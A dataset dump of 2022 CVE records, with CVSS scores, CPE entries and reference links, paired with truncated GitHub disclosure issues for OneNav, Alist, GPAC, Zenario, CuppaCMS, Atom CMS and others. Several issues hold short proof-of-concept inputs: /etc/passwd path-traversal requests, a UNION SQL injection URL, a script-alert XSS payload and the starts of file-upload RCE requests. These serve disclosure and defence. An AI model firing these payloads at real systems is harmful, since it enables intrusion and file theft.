[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/helloxz/onenav/issues/44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/helloxz/onenav/issues/44" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onenav:onenav:0.9.14:*:*:*:*:*:*:*", "matchCriteriaId": "4DA02DB7-4E32-4E42-8A01-0CE6D7B7D9FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "22" ]
22
https://github.com/helloxz/onenav/issues/44
[ "Third Party Advisory" ]
github.com
[ "helloxz", "onenav" ]
### 漏洞简介 Vulnerability Introduction 由于index.php存在拼接且未经过滤的可控参数文件包含,可以进行路径穿越包含php原生pearcmd.php导致写入恶意文件Getshell。 Due to the inclusion of spliced and unfiltered controllable parameter files in index.php, path traversal can be performed to include php native pearcmd.php resulting in the writing of the malicious file g...
OneNav has directory traversal with file inclusion that can lead to Getshell
https://api.github.com/repos/helloxz/onenav/issues/44/comments
2
2022-02-25T06:00:26Z
2022-03-12T03:19:38Z
https://github.com/helloxz/onenav/issues/44
1,150,075,677
44
3,334
CVE-2022-26533
2022-03-12T01:15:35.843
Alist v2.1.0 and below was discovered to contain a cross-site scripting (XSS) vulnerability via /i/:data/ipa.plist.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Xhofe/alist/issues/645" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alist_project:alist:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B7623B9-7203-4C19-893D-C2DFCE6B4F81", "versionEndExcluding": null, "versionEndIncluding": "2.1.0", "versionStartExc...
[ "79" ]
79
https://github.com/Xhofe/alist/issues/645
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Xhofe", "alist" ]
### Alist Version / Alist 版本 v2.0.10-v2.1.0 ### Describe the bug / 问题描述 ## Vulnerability Introduction A route in Alist that uses user-inputted parameters when displaying xml files and does not filter them can cause xss. Vulnerability affects version: v2.0.10-v2.1.0 ## Vulnerability Analysis A new route w...
Alist has Cross Site Scripting (XSS) vulnerability
https://api.github.com/repos/AlistGo/alist/issues/645/comments
3
2022-03-01T03:38:23Z
2022-03-12T03:21:49Z
https://github.com/AlistGo/alist/issues/645
1,154,821,631
645
3,335
CVE-2022-26967
2022-03-12T22:15:08.757
GPAC 2.0 allows a heap-based buffer overflow in gf_base64_encode. It can be triggered via MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2138" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "22E296B6-C912-468A-8A88-EC33272D81FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nu...
[ "787" ]
787
https://github.com/gpac/gpac/issues/2138
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough info...
[BUG] heap-buffer-overflow in gf_base64_encode
https://api.github.com/repos/gpac/gpac/issues/2138/comments
3
2022-03-10T09:47:43Z
2022-08-03T09:44:25Z
https://github.com/gpac/gpac/issues/2138
1,164,990,736
2,138
3,336
CVE-2022-26981
2022-03-13T18:15:08.343
Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/12" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldis...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:liblouis:liblouis:*:*:*:*:*:*:*:*", "matchCriteriaId": "03F25854-38F4-4036-A5B1-624ACE32BC55", "versionEndExcluding": null, "versionEndIncluding": "3.21.0", "versionStartExcl...
[ "120" ]
120
https://github.com/liblouis/liblouis/issues/1171
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "liblouis", "liblouis" ]
**Describe the bug** There is a global-buffer-overflow bug found in compilePassOpcode, can be triggered via lou_checktable+ ASan **To Reproduce** Steps to reproduce the behavior: ``` export CC=clang && export CFLAGS="-fsanitize=address -g" ./autogen.sh && ./configure --disable-shared --disable-local-libopts && ...
[BUG] global-buffer-overflow in lou_checktable
https://api.github.com/repos/liblouis/liblouis/issues/1171/comments
3
2022-03-04T08:53:12Z
2022-08-03T09:41:02Z
https://github.com/liblouis/liblouis/issues/1171
1,159,399,358
1,171
3,337
CVE-2022-24575
2022-03-14T14:15:07.830
GPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2058" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/b...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/2058
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
``` Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1647-gb6f68145e-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/12...
Use After Free
https://api.github.com/repos/gpac/gpac/issues/2058/comments
1
2022-01-21T08:54:48Z
2022-01-21T11:26:56Z
https://github.com/gpac/gpac/issues/2058
1,110,211,366
2,058
3,338
CVE-2022-24576
2022-03-14T14:15:07.877
GPAC 1.0.1 is affected by Use After Free through MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2061" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/b...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "416" ]
416
https://github.com/gpac/gpac/issues/2061
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
``` Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1646-gddd7990bb-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/12...
Heap-based Buffer Overflow
https://api.github.com/repos/gpac/gpac/issues/2061/comments
0
2022-01-21T08:56:18Z
2022-01-21T11:26:35Z
https://github.com/gpac/gpac/issues/2061
1,110,212,655
2,061
3,339
CVE-2021-41952
2022-03-14T15:15:09.287
Zenario CMS 9.0.54156 is vulnerable to Cross Site Scripting (XSS) via upload file to *.SVG. An attacker can send malicious files to victims and steals victim's cookie leads to account takeover. The person viewing the image of a contact can be victim of XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Trac...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tribalsystems:zenario:9.0.54156:*:*:*:*:*:*:*", "matchCriteriaId": "9DF42985-A221-41A6-BEC8-DF816BE2A0F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "79" ]
79
https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hieuminhnv", "Zenario-CMS-9.0-last-version" ]
**Summary** hi team, I found small XSS upload file to SVG. **Info** 1. Zenario CMS 9.0.54156 last version 2. FireFox 92.0.1 (64-bit) ![image](https://user-images.githubusercontent.com/28292732/135416702-9cef5987-4f27-4967-bcef-45b30a22c1e4.png) **Steps** 1. Login to account http://xxx.xxx.x.x/admin.php...
XSS upload file to *.SVG in Zenario CMS 9.0.54156
https://api.github.com/repos/hieuminhnv/Zenario-CMS-last-version/issues/1/comments
0
2021-09-30T08:49:15Z
2023-02-09T17:44:29Z
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/1
1,011,898,375
1
3,340
CVE-2021-42171
2022-03-14T15:15:09.327
Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/166617/Zenario-CMS-9.0.54156-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tribalsystems:zenario:9.0.54156:*:*:*:*:*:*:*", "matchCriteriaId": "9DF42985-A221-41A6-BEC8-DF816BE2A0F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "434" ]
434
https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hieuminhnv", "Zenario-CMS-9.0-last-version" ]
**Summary** hi team, I found high Upload file to RCE. **Info** Zenario CMS 9.0.54156 last version FireFox 92.0.1 (64-bit) ![image](https://user-images.githubusercontent.com/28292732/136005207-601d0a9f-96d2-4452-9888-c34cff3037ef.png) **Steps** 1. Login to account http://xxx.xxx.x.x/admin.php?cID=1&cType=h...
Upload file to RCE in Zenario CMS 9.0.54156
https://api.github.com/repos/hieuminhnv/Zenario-CMS-last-version/issues/2/comments
0
2021-10-05T10:49:07Z
2023-02-09T17:45:14Z
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/2
1,016,172,365
2
3,341
CVE-2022-24762
2022-03-14T23:15:08.427
sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/commit/a24f4b776fb18191ae0f7e3d90c2c7bec459431a" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tra...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sysend.js_project:sysend.js:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "A43EE609-11E5-4F09-852C-915CA49B4597", "versionEndExcluding": "1.10.0", "versionEndIncluding": null, "...
[ "346" ]
346
https://github.com/jcubic/sysend.js/issues/33
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jcubic", "sysend.js" ]
If users use cross-domain communication, attackers can create an iframe and listen to any messages sent from the app and also send messages to the app. This happens only in the same browser so this is low impact. Example exploit, if you upload this file to any domain, you can intercept messages from http://jcubic.pl...
Leaking of potentially sensitive user information on Cross-Domain communication
https://api.github.com/repos/jcubic/sysend/issues/33/comments
0
2022-03-13T12:52:34Z
2022-03-13T13:21:33Z
https://github.com/jcubic/sysend/issues/33
1,167,571,997
33
3,342
CVE-2022-24721
2022-03-15T14:15:08.247
CometD is a scalable comet implementation for web messaging. In any version prior to 5.0.11, 6.0.6, and 7.0.6, internal usage of Oort and Seti channels is improperly authorized, so any remote user could subscribe and publish to those channels. By subscribing to those channels, a remote user may be able to watch cluster...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL"...
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cometd/cometd/issues/1146" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cometd:cometd:*:*:*:*:*:*:*:*", "matchCriteriaId": "C396054E-E663-49EF-8212-2D3BFACDCA0A", "versionEndExcluding": "5.0.11", "versionEndIncluding": null, "versionStartExcludin...
[ "863" ]
863
https://github.com/cometd/cometd/issues/1146
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cometd", "cometd" ]
**CometD version(s)** 5.0.x **Description** Review usage of channels used by CometD (e.g. `Oort` and `Seti`).
Review Oort/Seti channel usage
https://api.github.com/repos/cometd/cometd/issues/1146/comments
0
2022-02-22T16:39:08Z
2022-02-25T09:26:35Z
https://github.com/cometd/cometd/issues/1146
1,147,132,252
1,146
3,343
CVE-2022-25485
2022-03-15T18:15:12.047
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "829" ]
829
https://github.com/CuppaCMS/CuppaCMS/issues/24
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Product version:cuppaCMS v1.0 [http://cuppacms.com/files/cuppa_cms.zip](http://cuppacms.com/files/cuppa_cms.zip) ## poc ``` POST /alerts/alertLightbox.php url=../../../../../../../../../../../etc/passwd ``` <img width="1268" alt="image" src="https://user-images.githubusercontent.com/38547290/154226358-354ef363-b...
Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in /alerts/alertLightbox.php
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/24/comments
1
2022-02-16T08:43:24Z
2022-02-16T11:37:28Z
https://github.com/CuppaCMS/CuppaCMS/issues/24
1,139,705,740
24
3,344
CVE-2022-25486
2022-03-15T18:15:12.230
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/15" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "829" ]
829
https://github.com/CuppaCMS/CuppaCMS/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Greetings, I found a LFI vulnerability in CuppaCMS. How is disclosure process exactly done. Can you provide me an email where I can contact you with the details.
Multiple non authenticated local file inclusions found
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/15/comments
0
2022-01-04T14:09:43Z
2023-11-14T23:17:28Z
https://github.com/CuppaCMS/CuppaCMS/issues/15
1,093,392,205
15
3,345
CVE-2022-25486
2022-03-15T18:15:12.230
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/15" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "829" ]
829
https://github.com/CuppaCMS/CuppaCMS/issues/25
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Product version:cuppaCMS v1.0 [http://cuppacms.com/files/cuppa_cms.zip](http://cuppacms.com/files/cuppa_cms.zip) ## poc ``` POST /alerts/alertConfigField.php urlConfig=../../../../../../../../../../../../../../etc/passwd ``` ![image](https://user-images.githubusercontent.com/38547290/154229228-9fd38bfd-af68-4231-...
Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/25/comments
0
2022-02-16T08:54:20Z
2023-11-14T23:14:18Z
https://github.com/CuppaCMS/CuppaCMS/issues/25
1,139,719,083
25
3,346
CVE-2022-25487
2022-03-15T18:15:12.287
Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "434" ]
434
https://github.com/thedigicraft/Atom.CMS/issues/256
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thedigicraft", "Atom.CMS" ]
An Unauthorized attacker can upload arbitrary file in the /admin/uploads.php and executing it on the server reaching the RCE. ## poc ``` POST /admin/uploads.php?id=1 HTTP/1.1 Host: localhost:8888 Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041 Content-Length...
An Unauthorized Remote Code Execution vulnerability exists in AtomCMS v2.0.
https://api.github.com/repos/thedigicraft/Atom.CMS/issues/256/comments
4
2022-02-16T13:50:57Z
2024-09-14T00:26:40Z
https://github.com/thedigicraft/Atom.CMS/issues/256
1,140,049,738
256
3,347
CVE-2022-25488
2022-03-15T18:15:12.343
Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/257" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Th...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "89" ]
89
https://github.com/thedigicraft/Atom.CMS/issues/257
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thedigicraft", "Atom.CMS" ]
## poc `/admin/ajax/avatar.php?id=-1 union select user()%23` the user() output can be found in html source <img width="1010" alt="image" src="https://user-images.githubusercontent.com/38547290/154280173-dffb698e-db1c-4746-9ef6-37ba8bae533e.png"> ## analysis file /admin/ajax/avatar.php line 7 without any fi...
Unauthorized Sql Injection in admin/ajax/avatar.php
https://api.github.com/repos/thedigicraft/Atom.CMS/issues/257/comments
2
2022-02-16T14:04:25Z
2022-12-22T21:15:09Z
https://github.com/thedigicraft/Atom.CMS/issues/257
1,140,064,983
257
3,348
CVE-2022-25489
2022-03-15T18:15:12.430
Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thedigicraft/Atom.CMS/issues/258" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Th...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/thedigicraft/Atom.CMS/issues/258
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thedigicraft", "Atom.CMS" ]
## EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in /widgets/debug.php ## exp `/widgets/debug.php?a=<script>alert(1)</script>` <img width="1267" alt="image" src="https://user-images.githubusercontent.com/38547290/154298484-d1cccad0-074e-4aed-9299-bdc8accc2...
Reflected XSS attack in /widgets/debug.php with the a parameter in AtomCMS 2.0
https://api.github.com/repos/thedigicraft/Atom.CMS/issues/258/comments
2
2022-02-16T15:32:48Z
2022-12-22T21:14:35Z
https://github.com/thedigicraft/Atom.CMS/issues/258
1,140,196,236
258
3,349
CVE-2022-25494
2022-03-15T18:15:12.777
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via staff_login.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/g33kyrash/Online-Banking-system/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:online_banking_system_project:online_banking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "69D0D756-F3BA-4E32-9F56-9B8CA0F47FB2", "versionEndExcluding": null, "versionEndIncluding": nul...
[ "89" ]
89
https://github.com/g33kyrash/Online-Banking-system/issues/16
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "g33kyrash", "Online-Banking-system" ]
## poc First visit http://ip:port/staff_login.php <img width="1089" alt="image" src="https://user-images.githubusercontent.com/38547290/154430289-dcb7f4f6-de98-4b43-a674-971e36e2a5bc.png"> Enter any user and password,Use burp to capture packets ![image](https://user-images.githubusercontent.com/38547290/154430407-6...
There is a SQL injection vulnerability in staff_login.php
https://api.github.com/repos/g33kyrash/Online-Banking-system/issues/16/comments
0
2022-02-17T07:58:38Z
2022-02-17T07:58:38Z
https://github.com/g33kyrash/Online-Banking-system/issues/16
1,140,992,138
16
3,350
CVE-2022-25495
2022-03-15T18:15:12.840
The component /jquery_file_upload/server/php/index.php of CuppaCMS v1.0 allows attackers to upload arbitrary files and execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "434" ]
434
https://github.com/CuppaCMS/CuppaCMS/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Non-authenticated attacker can upload arbitrary file via the /js/jquery_file_upload/server/php/index.php and executing it on the server reaching the RCE. ## poc ``` POST /classes/ajax/Functions.php HTTP/1.1 Host: localhost:8888 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XM...
Unauthorized Remote Code Execution vulnerability exists in Cuppa cms via file upload function
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/26/comments
0
2022-02-19T14:51:30Z
2022-02-19T17:04:10Z
https://github.com/CuppaCMS/CuppaCMS/issues/26
1,144,737,764
26
3,351
CVE-2022-25497
2022-03-15T18:15:12.920
CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
